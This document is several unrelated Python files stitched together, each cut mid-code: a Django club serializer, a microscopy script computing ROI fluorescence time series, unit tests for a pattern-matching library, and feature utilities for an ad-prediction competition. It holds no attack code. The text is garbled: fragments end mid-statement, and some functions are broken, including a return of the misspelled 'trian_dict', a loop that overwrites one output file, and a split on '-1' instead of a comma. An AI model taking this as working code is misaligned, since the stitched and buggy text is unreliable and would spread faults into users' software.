a quicker response. """ tags = TagSerializer(many=True) image_url = serializers.SerializerMethodField("get_image_url") favorite_count = serializers.IntegerField(read_only=True) membership_count = serializers.IntegerField(read_only=True) is_favorite = serializers.SerializerMethodField("get_is_favorite") is_subscribe = serializers.SerializerMethodField("get_is_subscribe") is_member = serializers.SerializerMethodField("get_is_member") email = serializers.SerializerMethodField("get_email") subtitle = serializers.SerializerMethodField("get_short_description") def get_email(self, obj): if obj.email_public: return obj.email return "Hidden" def get_short_description(self, obj): if obj.subtitle: return obj.subtitle # return first sentence of description without html tags desc = obj.description.lstrip()[:1000] cleaned_desc = re.sub(r"<[^>]+>", "", desc) return ( "".join(re.split(r"(\.|\n|!)", cleaned_desc)[:2]) .replace("&amp;", "&") .replace("&lt;", "<") .replace("&gt;", ">") .replace("&ndash;", "-") .replace("&mdash;", "-") .replace("&nbsp;", " ") .strip() ) def get_is_favorite(self, obj): user = self.context["request"].user if not user.is_authenticated: return False if hasattr(obj, "user_favorite_set"): return bool(obj.user_favorite_set) return obj.favorite_set.filter(person=user).exists() def get_is_subscribe(self, obj): user = self.context["request"].user if not user.is_authenticated: return False if hasattr(obj, "user_subscribe_set"): return bool(obj.user_subscribe_set) return obj.subscribe_set.filter(person=user).exists() def get_is_member(self, obj): user = self.context["request"].user if not user.is_authenticated: return False if hasattr(obj, "user_membership_set"): mship = next(iter(obj.user_membership_set), None) else: mship = obj.membership_set.filter(person=user).first() if mship is None: return False return mship.role def get_image_url(self, obj): # use small version if exists image = obj.image_small if not image: image = obj.image # correct path rendering if not image: return None if image.url.startswith("http"): return image.url elif "request" in self.context: return self.context["request"].build_absolute_uri(image.url) else: return image.url def get_fields(self): """ Override the fields that are returned if the "fields" GET parameter is specified. Acts as a filter on the returned fields. """ all_fields = super().get_fields() # add in additional report fields if hasattr(self.__class__, "get_additional_fields"): for fields in self.__class__.get_additional_fields().values(): for field in fields.values(): all_fields[field] = ReportClubField(field, read_only=True) fields_param = getattr(self.context.get("request", dict()), "GET", {}).get( "fields", "" ) if fields_param: fields_param = fields_param.split(",") else: return all_fields fields_subset = dict() for k in fields_param: if k in all_fields: fields_subset[k] = all_fields[k] return fields_subset if len(fields_subset) > 0 else all_fields def to_representation(self, instance): """ Return the previous approved version of a club for users that should not see unapproved content. """ if instance.ghost and not instance.approved: user = self.context["request"].user can_see_pending = user.has_perm("clubs.see_pending_clubs") or user.has_perm( "clubs.manage_club" ) is_member
import numpy as np import matplotlib.pyplot as plt from tqdm import tqdm import cv2 import os import pickle import json from roipoly.roipoly import RoiPoly, MultiRoi import argparse import datetime import time from threading import Timer, Thread from OPTIMAS.utils.files_handling import images_list, read_fps, \ load_timing_data, read_image_size def input_path(): user_input = input('input neurons png file or ROI mask file:') user_input_ok = True return user_input def time_serie(input_data_folder, experiment, data_type='raw', timing=True, draw_laser_timings=True, draw_dlp_timings=True, time_start=0, time_stop=int(-1)): data_export = [] # placeholder for saving data at the end ### PATHS ### if data_type == 'raw': path_input_images = f"{input_data_folder}/{experiment}/images/" elif data_type == 'denoised': path_input_images = f"{input_data_folder}/experiment_{experiment}/denoised_images/" path_output = f"{input_data_folder}/{experiment}/" # if roi comes from manual countours roi_file_path = f'{path_output}/roi_masks.txt' images = images_list(path_input_images) ############# ### ROIS #### ############# ## TODO: use the image from the dlp to do the ROIs ? what if not all rois ## on it ? Use a global Roi file ? How to define it ? if os.path.isfile(roi_file_path): print('ROI file exists') with open(roi_file_path, "rb") as file: rois = pickle.load(file) else: print('ROI file doesnt exists') w,h = read_image_size(f'{input_data_folder}/{experiment}/{experiment}_info.json') # TODO: ref image for defining rois, need to think about what it can be. The best would be a DIC image ? # use an automatic segmentation algorithm if possible with a DIC image ? neurons_png = f'{input_data_folder}/{experiment}/neurons.png' if os.path.exists(neurons_png): print('neurons file for delimiting ROI exists') image = cv2.imread(f'{input_data_folder}/{experiment}/neurons.png', cv2.IMREAD_GRAYSCALE) # from scipy.ndimage import convolve # image_downsampled = convolve(image, # np.array([[0.25,0.25],[0.25,0.25]]))[:image.shape[0]:2,:image.shape[1]:2] # image = image_downsampled ##################################################### ##### TO CHANGE IN UPDATED PIPELINE VERSION ######### # else: # print('no neuron image file') # pass # # print('''need user input for ROI file path: it needs to be an image # from the image folder where you can see the neurons''') # user_input = [None] # global user_input_ok # user_input_ok = False # thread = Thread(target=input_path, daemon=False) # thread.start() # time.sleep(15) # if user_input_ok: # thread.join() # print(user_input) # else: # thread._stop() # if ROI_path.endswith('.txt'): # with open(ROI_path, "rb") as file: # rois = pickle.load(file) # elif ROI_path.endswith('.png'): # image = cv2.imread(ROI_path, cv2.IMREAD_GRAYSCALE) # cv2.imwrite(f'{input_data_folder}/{experiment}/neurons.png', image) # if image.size == 0: # print('error with neuron image, cannot define ROIs') # else: # image = cv2.resize(image, (w,h)) ###################################################################### # Show the image fig = plt.figure() plt.imshow(image, interpolation='none', cmap='gray') plt.title("Click on the button to add a new ROI") # Draw multiple ROI multiroi_named = MultiRoi(roi_names=['Background', 'ROI 1', 'ROI 2', 'ROI 3', 'ROI 4', 'ROI 5', 'ROI 6', 'ROI 7', 'ROI 8', 'ROI 9', 'ROI 10', 'ROI 11', 'ROI 12', 'ROI 13', 'ROI 14', 'ROI 15', 'ROI 16', 'ROI 17']) # Draw all ROIs plt.imshow(image, interpolation='none', cmap='gray') rois = [] for name, roi in multiroi_named.rois.items(): roi.display_roi() # roi.display_mean(image) mask = roi.get_mask(image) rois.append([name, mask]) plt.legend() plt.savefig(f'{path_output}/rois.png') plt.close() ## writing rois to disk with open(roi_file_path, "wb") as file: pickle.dump(rois, file) rois_signal = [] ## not the most optimized, would be better to log every roi in each image than load every image multiple times for roi in rois: tmp_time_serie_roi = [] for image in tqdm(images): img = cv2.imread(f'{path_input_images}/{image}',cv2.IMREAD_GRAYSCALE) mask = roi[1] ##################################################### ##### TO CHANGE IN UPDATED PIPELINE VERSION ######### # roi_average = np.mean(img[mask.T]) roi_average = np.mean(img[mask]) ################################################################### tmp_time_serie_roi.append(roi_average) rois_signal.append(tmp_time_serie_roi) print ('generating data plots') ### TIMING DATA ### json_timings_file = f'{input_data_folder}/{experiment}/{experiment}_timings.json' json_info_file = f'{input_data_folder}/{experiment}/{experiment}_info.json' if timing: timings_dlp_on, \ timings_dlp_off, \ timings_camera_images, \ timings_laser_on, \ timings_laser_off, \ timings_camera_images_bis = load_timing_data(json_timings_file) # timings perf_counter equivalent to unix timestamp # timings_camera_images_bis.append(660) # TODO: handle multiple dlp on/off within each experiment if len(timings_dlp_on)>1: print('more than 1 timing from DLP ON') timings_dlp_on = [timings_dlp_on[0]] ## for diagnostic plot for the times of the camera dcam api metadata # plt.plot(np.array(timings_camera_images), range(0,len(timings_camera_images))) ## use the timings metadata of the dcap api ## for now broken, replaced with manual incrementation #timings_camera_images_new = timings_camera_images[time_init : time_end] ## back to this when solved problem of metadata from the dcam api timings_camera_images_new = [] timings_camera_images_new.append(timings_camera_images[0]) for nb_of_times in range(1,len(timings_camera_images)): fps = read_fps(json_info_file) ## to get for each expe timings_camera_images_new.append(timings_camera_images[0] + (1/fps * nb_of_times)) ## diagnostic # plt.plot(np.array(timings_camera_images_new), range(0,len(timings_camera_images_new))) timings_camera_images = timings_camera_images_new print(f'number of camera images: {len(timings_camera_images)}') print(f'number of points in the each roi signal: {len(rois_signal[0])}') assert len(images) == len(timings_camera_images), 'not the same number of images and images timing metadata' ## will not work when working on subset of the data ## to put both dlp, laser and camera timings in the same format ## putting dlp and laser time refs back into camera ref #timings_camera_images = [timings_camera_images[i]*10**9 for i in range(len(timings_camera_images))] ##for dcam api meta _timings_dlp_on = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_dlp_on[0] - timings_camera_images_bis[1])/1000 _timings_dlp_off = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_dlp_off[0] - timings_camera_images_bis[1])/1000 ########################################################################## #################### TO UPDATE #################### #################### _timings_laser_on = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_laser_on[0] - timings_camera_images_bis[1])/1000 # _timings_laser_on = 0 _timings_laser_off = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_laser_off[0] - timings_camera_images_bis[1])/1000 # _timings_laser_off = 0 ################################################################################ ################################################################################ timings_dlp_on = [] timings_dlp_off = [] timings_laser_on = [] timings_laser_off = [] timings_dlp_on.append(_timings_dlp_on) timings_dlp_off.append(_timings_dlp_off) timings_laser_on.append(_timings_laser_on) timings_laser_off.append(_timings_laser_off) ### if different length between timings and images # cropped_rois_signal = [] # for roi_signal in rois_signal: # cropped_rois_signal.append(roi_signal[0:len(timings_camera_images)]) # len(cropped_rois_signal[0]) # rois_signal = cropped_rois_signal time_sorted_rois_signal = [] x_axis_sorted_values = [] for i in range(len(rois_signal)): data = np.vstack((timings_camera_images, rois_signal[i])) data.shape time_sorted_rois_signal.append(data[1][data[0,:].argsort()]) x_axis_sorted_values = np.array(data[0][data[0,:].argsort()]) x_axis = np.array([(x_axis_sorted_values[frame] - x_axis_sorted_values[0]) for frame in range(len(x_axis_sorted_values))]) ## diagnostic plot: time between 2 images times_between_two_images = [] for frame in range(len(x_axis)-1): times_between_two_images.append((x_axis[frame+1] - x_axis[frame])) times_between_two_images.append(times_between_two_images[-1]) nb_images = np.arange(0,len(data[1]), 1) #plt.plot(nb_images, np.array(times_between_two_images)) rois_signal = time_sorted_rois_signal ## for baseline calculation: if timing: # find laser_on index on x_axis takeClosest = lambda num,collection:min(collection,key=lambda x:abs(x-num)) closest_index_laser_on_on_x = takeClosest(timings_laser_on[0]/10**9, x_axis) index_laser_on_for_baseline_calc = np.where(x_axis == closest_index_laser_on_on_x) # find dlp_on index on x_axis closest_index_dlp_on_on_x = takeClosest(timings_dlp_on[0]/10**9, x_axis) index_dlp_on_for_baseline_calc = np.where(x_axis == closest_index_dlp_on_on_x) ## baseline starting and ending ## need to be timed on the frames after laser activation I think baseline_starting_frame = index_laser_on_for_baseline_calc[0][0] + 2 #TODO: need to be adjusted to be up to the frame-1 of dlp activation ? baseline_frame_number = 10 else : baseline_starting_frame = 1000 baseline_frame_number = 10 ### GRAPHS ### # calculation of F(t) colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] # if timings is False no x_axis has been defined if timing == False: x_axis = np.arange(0,len(images), 1) for i in range(len(rois_signal)): plt.plot(x_axis, np.array(rois_signal[i]), color = colors[i], label = rois[i][0], alpha=0.7) if timing: for i in range(len(timings_dlp_on)): if draw_dlp_timings: plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0], timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05) if draw_laser_timings: plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0], timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05) plt.legend() plt.title('Pixel value evolution with frames') plt.ylabel('Value') if timing == False: plt.savefig(f'{path_output}pixel_time_serie_whole_data.svg') #plt.savefig(path_output+'pixel_time_serie_whole_data.png') elif timing == True: plt.savefig(f'{path_output}pixel_time_serie_whole_data_{time_start}_{time_stop}.svg') #plt.savefig(f'{path_output}pixel_time_serie_whole_data_{args.time[0]}_{args.time[1]}.png') plt.close() ## calculation of F(t) - background(t) for i in np.arange(1, len(rois_signal), 1): plt.plot(x_axis, np.array(rois_signal[0])-np.array(rois_signal[i]), color = colors[i], label = rois[i][0], alpha=0.7) if timing: for i in range(len(timings_dlp_on)): if draw_dlp_timings: plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05) if draw_laser_timings: plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05) plt.title('Fluorescence with substracted backg fluorescence (per frame)') plt.ylabel('Value') plt.legend() if timing == False: plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_whole_data.svg') #plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_whole_data.png') elif timing == True: plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_{time_start}_{time_stop}.svg') #plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_{args.time[0]}_{args.time[1]}.png') plt.close() ## calculation of percent delta F/F0 times = [] baseline_background = np.mean(np.array(rois_signal[0][baseline_starting_frame:baseline_starting_frame+baseline_frame_number])) ## temporal average if baseline_background == 0.0: baseline_background = 1.0 dF_over_F0_background = ((np.array(rois_signal[0]) - baseline_background) / baseline_background) percent_dF_over_F0_background = dF_over_F0_background*100 # plt.plot(x_axis, percent_dF_over_F0_background, color= 'b', label = rois[0][0], alpha=0.7) if timing: for i in range(len(timings_dlp_on)): if draw_dlp_timings: plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05) if draw_laser_timings: plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05) for i in np.arange(1, len(rois_signal), 1): _times = [] baseline_soma = np.mean(np.array(rois_signal[i][baseline_starting_frame:baseline_starting_frame + baseline_frame_number])) if baseline_soma == 0.0: baseline_soma = 1.0 dF_over_F0_soma = ((np.array(rois_signal[i]) - baseline_soma) / baseline_soma) - dF_over_F0_background percent_dF_over_F0_soma = dF_over_F0_soma * 100 # plt.ylim([-5,35]) plt.plot(x_axis, percent_dF_over_F0_soma, color = colors[i], label = rois[i][0], alpha=0.7) data_export.append(percent_dF_over_F0_soma.tolist()) if timing: dlp_on_value_on_x = 0 dlp_off_value_on_x = 0 laser_off_value_on_x = 0 laser_on_value_on_x = 0 for i in range(len(timings_dlp_on)): if draw_dlp_timings: dlp_on_value_on_x = timings_dlp_on[i] - x_axis_sorted_values[0] dlp_off_value_on_x = timings_dlp_off[i] - x_axis_sorted_values[0] plt.axvspan(dlp_on_value_on_x, dlp_off_value_on_x, color='blue', alpha=0.05) if draw_laser_timings: laser_on_value_on_x = timings_laser_on[i] - x_axis_sorted_values[0] laser_off_value_on_x = timings_laser_off[i] - x_axis_sorted_values[0] plt.axvspan(laser_on_value_on_x, laser_off_value_on_x, color='red', alpha=0.05) _times = dlp_on_value_on_x, dlp_off_value_on_x , laser_on_value_on_x, laser_off_value_on_x times.append(_times) plt.ylabel(r'$\%$
<reponame>mvitousek/pypat import unittest from pypat import * class TestExamples(unittest.TestCase): # Matching against literal values def test_literal(self): result = match(42, (234, lambda: False), (True, lambda: False), (42, lambda: True)) self.assertTrue(result) # If no case matches, a PatternException is thrown def test_fail(self): thunk = lambda: match(999, (234, lambda: False), (True, lambda: False), (42, lambda: True)) self.assertRaises(PatternException, thunk) # Special case: if you want to match against string literals in # patterns, you must wrap it in a Literal object (to disambiguate # from variable bindings, as shown later) def test_explicitliteral1(self): result = match('hello world', (Literal('hello world'), lambda: True), (42, lambda: False)) self.assertTrue(result) def test_explicitliteral2(self): result = match(42, (Literal('hello world'), lambda: True), (42, lambda: False)) self.assertFalse(result) # Strings that are not wrapped in Literal are variables. The # pattern's action function expects parameters with the same names # as the variables in the pattern. Variables match anything. def test_variables(self): class Arbitrary(object): def __eq__(self, other): return self.__class__ == other.__class__ result = match(Arbitrary(), (42, lambda: False), ('x', lambda x: x)) self.assertEqual(result, Arbitrary()) # If you want to match against any value without binding it to a # variable, use the '_' symbol (in a string). def test_any(self): result = match(4545, (42, lambda: False), (10101, lambda: False), ('_', lambda: True)) self.assertTrue(result) # You can also add guards to cases. The guard is an instance of # type Guard, which takes a function, which itself takes variables # introduced in its pattern. The guard can go in between the # pattern and the action function of the case. def test_guards(self): result = match('hello world', ('x', Guard(lambda x: isinstance(x, int)), lambda x: x * x), ('x', Guard(lambda x: isinstance(x, str)), lambda x: x)) self.assertEqual(result, 'hello world') # You can match against tuples by putting tuples in your # patterns. Tuples can contain any pattern, and variables will be # bound appropriately. def test_tuple(self): def arith(*op): return match(op, ((Literal('+'), 'x', 'y'), lambda x, y: x + y), ((Literal('*'), 'x', 'y'), lambda x, y: x * y), ((Literal('pred'), 'x'), lambda x: x - 1)) self.assertEqual(arith('*', 4, 5), 20) self.assertEqual(arith('+', 39, 3), 42) self.assertEqual(arith('pred', 4), 3) # If the same variable appears more than once in a pattern, it has # to be bound to the same value each time for the pattern to match def test_multi(self): def eq(v1, v2): return match((v1, v2), (('x', 'x'), lambda x: True), (('x', 'y'), lambda x,y: False)) self.assertTrue(eq(3,3)) self.assertFalse(eq(2,5)) # If the same action (and variable bindings) will be used for # multiple cases, you can add additional patterns to a case with # the Or class, which takes a pattern. def test_ors(self): def timesWillEqZero(n1, n2): return match((n1, n2), ((0, 'x'), Or(('x', 0)), lambda x: True), ('_', lambda: False)) self.assertTrue(timesWillEqZero(0, 43)) self.assertTrue(timesWillEqZero(42, 0)) self.assertFalse(timesWillEqZero(42, 2)) # Lists can be matched against using the PairList and EmptyList # classes. PairLists are nonempty lists that have a head and a # tail, and EmptyLists are empty lists. def test_list(self): def mmap(op, lst): return match(lst, (PairList('x', 'xs'), lambda x, xs: [op(x)] + mmap(op, xs)), (EmptyList(), lambda: [])) self.assertEqual(mmap((lambda x: x * x), [1,2,3,4]), [1,4,9,16]) # You can match based on the runtime type of a matched value by # putting types in the patterns. def test_types(self): result = match('hello world', (int, lambda: False), (str, lambda: True)) self.assertTrue(result) # If you want to bind the target (or a portion of it) to a # variable, but you also want to pattern match on something deeper # in the target, you can use the As class to do both: def test_as(self): def expr(*op): return match(op, ((Literal('+'), As('x', int), As('y', int)), lambda x, y: x + y), ((Literal('or'), As('x', bool), As('y', bool)), lambda x, y: x or y)) self.assertEqual(expr('or', True, False), True) self.assertEqual(expr('+', 39, 3), 42) self.assertRaises(PatternException, lambda: expr('or', 1, 2)) def test_deepas(self): result = match([1,2,3], (PairList('_', As('r', PairList(As('x', int),'_'))), lambda x,r: '%s is in %s' % (x,r))) self.assertEqual(result, '2 is in [2, 3]') # Objects that do not perform any kind of input checking can be # subclassed from PureMatchable and then used as patterns. def test_purematch1(self): class C(PureMatchable): def __init__(self, a, b, c): pass self.assertEqual(match(C(1,2,'3'), (C(3,'b','c'), lambda b,c: b), (C('a','b',Literal('3')), lambda a,b: a), (C('a','b','c'), lambda a,b,c: c), ('_', lambda: None)), 1) def test_purematch2(self): class Expr(PureMatchable): pass class Add(Expr): def __init__(self, rand1, rand2): pass class Mult(Expr): def __init__(self, rand1, rand2): pass class Num(Expr): def __init__(self, n): pass def step(expr): return match(expr, (Add(Num('n1'), Num('n2')), lambda n1, n2: Num(n1 + n2)), (Add(Num('n1'), 'n2'), lambda n1, n2: Add(Num(n1), step(n2))), (Add('n1', 'n2'), lambda n1, n2: Add(step(n1), n2)), (Mult(Num('n1'), Num('n2')), lambda n1, n2: Num(n1 * n2)), (Mult(Num('n1'), 'n2'), lambda n1, n2: Mult(Num(n1), step(n2))), (Mult('n1', 'n2'), lambda n1, n2: Mult(step(n1), n2))) def eval(expr): return match(expr, (Num('n'), lambda n: n), ('e', lambda e: eval(step(e)))) self.assertEqual(eval(Add(Mult(Num(4), Num(2)), Add(Num(1), Add(Num(0), Num(1))))), 10) # Objects that can't be PureMatchable (because, for example, they # sanitize inputs, or it makes sense to decompose them into # something other than their constructor's arguments) can subclass # from Matchable, and implement pattern() (which is a class # method) and decompose(). decompose() returns the decomposition # of the object, which can be anything the user desires as long as # it is a valid match target. pattern() should take patterns and # return them in such a way that they can match decompose() # (including caveats like strings needing to be in # Literal). [CLASS].pattern() should then be used in lieu of the # classname alone. def test_matchable(self): class Summer(Matchable): def __init__(self, *nums): self.sum = sum(nums) def decompose(self): return ('SUM', self.sum) @classmethod def pattern(cls, pat): return (Literal('SUM'), pat) result = match(Summer(1,2,3,4,5), (Summer.pattern(54), lambda: False), (Summer.pattern(As('x', int)), lambda x: x)) self.assertEqual(result, 15) # Functions can be defined as part of a match pattern with the # @matchable decorator, and the @[FUN].case decorator (where fun # is the name of the actual partially specified function) def test_sepdef1(self): @matchable(1) def factorial(): return 1 @factorial.case(0) def factorial(): return 0 @factorial.case(As('n',int), Guard(lambda n: n > 1)) def factorial(n): return factorial(n-1) * n self.assertEqual(factorial(5), 120) self.assertRaises(PatternException, lambda: factorial(-5)) def test_sepdef2(self): @matchable(As('x',Literal('Dog.'))) def foo(x): return x @foo.case(42, Or((-42,))) def foo(): return 'it\'s 42!!' @foo.case('a', int) def foo(a): return 'cdrnum' @foo.case() def foo(): return 'EMPTY' self.assertEqual(foo(42), 'it\'s 42!!') self.assertEqual(foo(3,2), 'cdrnum') self.assertEqual(foo('Dog.'), 'Dog.') self.assertEqual(foo(), 'EMPTY') self.assertRaises(PatternException, lambda: foo(3,'a')) self.assertRaises(PatternException, lambda: foo(22)) # Match object can be built and cases added to them. def test_matchobj(self): matcher = Match([(42, lambda: 'yes')]) matcher.add('x', Guard(lambda x: isinstance(x, int)), lambda x: x) matcher.add(('x', 'y'), lambda x,y: x + y) self.assertEqual(matcher(42), 'yes') self.assertEqual(matcher(120), 120) self.assertEqual(matcher((1,2)), 3) self.assertRaises(PatternException, lambda: matcher('bluh')) matcher.add('_', lambda: 'miss') self.assertEqual(matcher('bluh'), 'miss') def test_lambda(self): class LC(PureMatchable): pass class Abs(LC): def __init__(self, x, e): pass class App(LC): def __init__(self, e1, e2): pass class Var(LC): def __init__(self, x): pass # Lambda calculus def pp(e): return match(e, (Var('x'), lambda x: x), (Abs('x', 'e'), lambda x,e: '(lambda %s: %s)' % (x, pp(e))), (App('e1', 'e2'), lambda e1,e2: '%s(%s)' % (pp(e1), pp(e2)))) def is_val(e): return match(e, (Abs, lambda: True), ('_', lambda: False)) def step(e): return match(e, (App(Abs('x', 'e1'), 'e2'), Guard(lambda x,e1,e2: is_val(e2)), lambda x,e1,e2: subst(e1, x, e2)), (App(As('e1', Abs), 'e2'), lambda e1,e2: App(e1, step(e2))), (App('e1', 'e2'), lambda e1,e2: App(step(e1), e2)), name='step') def subst(e, x, v): return match((e, x), ((App('e1', 'e2'), '_'), lambda e1,e2: App(subst(e1,x,v), subst(e2,x,v))), ((As('e1',Abs('x', 'eb')), 'x'), lambda e1,x,eb: e1), ((Abs('y','e'), '_'), lambda y,e: Abs(y,subst(e,x,v))), ((Var('x'), 'x'), lambda x: v), ((Var('y'), '_'), lambda y: Var(y))) def leval(e): return match(e, ('_', Guard(lambda: is_val(e)), lambda: e), ('_', lambda: leval(step(e)))) plus = Abs('m', Abs('n', Abs('f', Abs('x', App( App(Var('m'), Var('f')), App( App(Var('n'), Var('f')), Var('x'))))))) zero = Abs('f', Abs('x', Var('x'))) one = Abs('f', Abs('x', App(Var('f'), Var('x')))) two = Abs('f', Abs('x', App(Var('f'), App(Var('f'), Var('x'))))) three = Abs('f', Abs('x', App(Var('f'), App(Var('f'), App(Var('f'), Var('x')))))) threeq = leval(App(App(plus, one), two)) psucc
<reponame>tangaqi/tencent2019-rank88<filename>tencent-chusai/src/utils.py import os import numpy as np from sklearn.base import BaseEstimator, TransformerMixin from sklearn.metrics import roc_auc_score from time import time import random import pandas as pd def frame_to_dict(train): train_dict = {} for col in train.columns: train_dict[col] = train[col].columns return trian_dict def write_data_into_parts(data, root_path, nums = 5100000): l = data.shape[0] // nums for i in range(l+1): begin = i * nums end = min(nums*(i+1), data.shape[0]) t_data = data[begin:end] t_data.tofile(root_path + '.bin') def write_dict(path, data): fw = open(path, 'w') for key in data: fw.write(str(key) + ',' + str(data[key]) + '\n') fw.close() def read_allfea(path): f = open(path,'r') fea = '0' for i in f: fea = i fea_val = fea.split(',') index_dict = {} for i,fea in enumerate(fea_val): index_dict[fea] = i + 1 if '-1' not in index_dict: index_dict['-1'] = len(fea_val) return fea, index_dict def one_hot_feature_process(train_data, val_data, test2_data, begin_num, filter_num = 0): index_dict = {} begin_index = begin_num train_res = [] for d in train_data: # print(d) # 给出现的value赋予一个index指引 if d not in index_dict: index_dict[d] = begin_index begin_index += 1 # print(index_dict[d]) train_res.append(index_dict[d]) if '-1' not in index_dict: index_dict['-1'] = begin_index val_res = [] for d in val_data: if d not in index_dict: index_dict[d] = begin_index begin_index += 1 val_res.append(index_dict[d]) test2_res = [] for d in test2_data: if d not in index_dict: d = '-1' test2_res.append(index_dict[d]) # print(np.array(train_res)) return np.array(train_res), np.array(val_res), np.array(test2_res),index_dict def vector_feature_process(train_data, val_data, test2_data, begin_num, max_len, index_dict): train_res = [] train_res2 = [] val_res2 = [] test2_res2 = [] train_rate = [] val_rate = [] test2_rate = [] for d in train_data: lx = d.split(',') row = [0] * max_len row2 = [0] * max_len if len(lx) > max_len or d == 'all': j = 0 for i in index_dict: if j >= max_len: break row[j] = index_dict[i] j += 1 train_res.append(row) row2 = [1] * max_len train_res2.append(row2) train_rate.append(1) continue for i, x in enumerate(lx): if x not in index_dict: x = '-1' row[i] = index_dict[x] row2[row[i]] = 1 train_res.append(row) train_res2.append(row2) train_rate.append(len(lx)/max_len) val_res = [] for d in val_data: lx = d.split(',') row = [0] * max_len row2 = [0] * max_len if len(lx) > max_len or d == 'all': j = 0 for i in index_dict: if j >= max_len: break row[j] = index_dict[i] j += 1 val_res.append(row) row2 = [1] * max_len val_res2.append(row2) val_rate.append(1) continue for i, x in enumerate(lx): if x not in index_dict: x = '-1' row[i] = index_dict[x] row2[row[i]] = 1 val_res.append(row) val_res2.append(row2) val_rate.append(len(lx)/max_len) test2_res = [] for d in test2_data: lx = d.split(',') row = [0] * max_len row2 = [0] * max_len if len(lx) > max_len or d == 'all': j = 0 for i in index_dict: if j >= max_len: break row[j] = index_dict[i] j += 1 test2_res.append(row) row2 = [1] * max_len test2_res2.append(row2) test2_rate.append(1) continue for i, x in enumerate(lx): if x not in index_dict: x = '-1' row[i] = index_dict[x] row2[row[i]] = 1 test2_res.append(row) test2_res2.append(row2) test2_rate.append(len(lx)/max_len) return np.array(train_res), np.array(val_res), np.array(test2_res), index_dict,np.array(train_res2), np.array(val_res2), np.array(test2_res2),np.array(train_rate), np.array(val_rate), np.array(test2_rate), def count_one_feature_times(train, val, test, fea, date): count_dict = {} val_res = [] test_res = [] train = pd.concat([train, val]) num1 = train[train['Reqday'] == '2_16'].shape[0] num2 = train[train['Reqday'] == '3_19'].shape[0] num3 = train.shape[0] train_res = [-1] * num1 # 对2-17的数据进行统计,对2-16的数据进行赋值 train1 = train[train['Reqday'] == '2_17'][fea].values for i,values in enumerate(train1): if values not in count_dict: count_dict[values] = 0 count_dict[values] += 1 if '-1' not in count_dict: count_dict['-1'] = 1 train1 = train[train['Reqday'] == '2_16'][fea].values for i, values in enumerate(train1): if values not in count_dict: values = '-1' train_res.append(count_dict[values]) for i in range(len(date)-2): count_dict = {} day1 = date[i+2] day2 = date[i+1] day3 = date[i] train_compute = train[train['Reqday'] == day1][fea].values train1 = train[train['Reqday'] == day2] train2 = train[train['Reqday'] == day3] count_train = pd.concat([train1, train2]) count_train_data = count_train[fea].values for values in count_train_data: if values not in count_dict: count_dict[values] = 0 count_dict[values] += 1 if '-1' not in count_dict: count_dict['-1'] = 1 for values in train_compute: if values not in count_dict: values = '-1' train_res.append(count_dict[values]/2) train_res1 = train_res[:num3-num2] val_res = train_res[-num2:] count_dict = {} train1 = train[train['Reqday'] == '3_18'] train2 = train[train['Reqday'] == '3_19'] count_train = pd.concat([train1, train2]) count_train_data = count_train[fea].values for values in count_train_data: if values not in count_dict: count_dict[values] = 0 count_dict[values] += 1 if '-1' not in count_dict: count_dict['-1'] = 1 for values in test: if values not in count_dict: values = '-1' test_res.append(count_dict[values]/2) # print(train_res1) return np.array(train_res1), np.array(val_res), np.array(test_res) def count_vector_feature_times(train, val, test, fea, date, flag): count_dict = {} val_res = [] test_res = None train = pd.concat([train, val]) num1 = train[train['Reqday'] == '2_16'].shape[0] num2 = train[train['Reqday'] == '3_19'].shape[0] num3 = train.shape[0] train_res = np.array([-1] * num1 * 2).reshape(num1, 2) # 对2-16的数据进行统计,对2-17的数据进行赋值 train1 = train[train['Reqday'] == '2_16'][fea].values for value in train1: values = value.split(',') for i in values: if i not in count_dict: count_dict[i] = 0 count_dict[i] += 1 if '-1' not in count_dict: count_dict['-1'] = 1 train1 = train[train['Reqday'] == '2_17'][fea].values for value in train1: row = [] values = value.split(',') for i in values: if i not in count_dict: i = '-1' row.append(count_dict[i]) l = [] l.append(np.max(row)) l.append(np.mean(row)) train_res = np.row_stack((train_res, l)) for i in range(len(date)-2): count_dict = {} day1 = date[i+2] day2 = date[i+1] day3 = date[i] train_compute = train[train['Reqday'] == day1][fea].values train1 = train[train['Reqday'] == day2] train2 = train[train['Reqday'] == day3] count_train = pd.concat([train1, train2]) count_train_data = count_train[fea].values for value in count_train_data: valuess = value.split(',') for values in valuess: if values not in count_dict: count_dict[values] = 0 count_dict[values] += 1 if '-1' not in count_dict: count_dict['-1'] = 1 for value in train_compute: row = [] values = value.split(',') for i in values: if i not in count_dict: i = '-1' row.append(count_dict[i]) l = [] l.append(max(row)) l.append(np.mean(row)) l = np.array(l) train_res = np.row_stack((train_res, l/2)) train_res1 = train_res[:num3-num2] val_res = train_res[-num2:] count_dict = {} test_flag = 1 train1 = train[train['Reqday'] == '3_18'] train2 = train[train['Reqday'] == '3_19'] count_train = pd.concat([train1, train2]) count_train_data = count_train[fea].values for value in count_train_data: valuess = value.split('-1') for values in valuess: if values not in count_dict: count_dict[values] = 0 count_dict[values] += 1 if '-1' not in count_dict: count_dict['-1'] = 1 print(test.shape) for value in test: row = [] valuess = value.split(',') for values in valuess: if values not in count_dict: values = '-1' row.append(count_dict[values]) l = [] l.append(max(row)) l.append(np.mean(row)) l = np.array(l) if 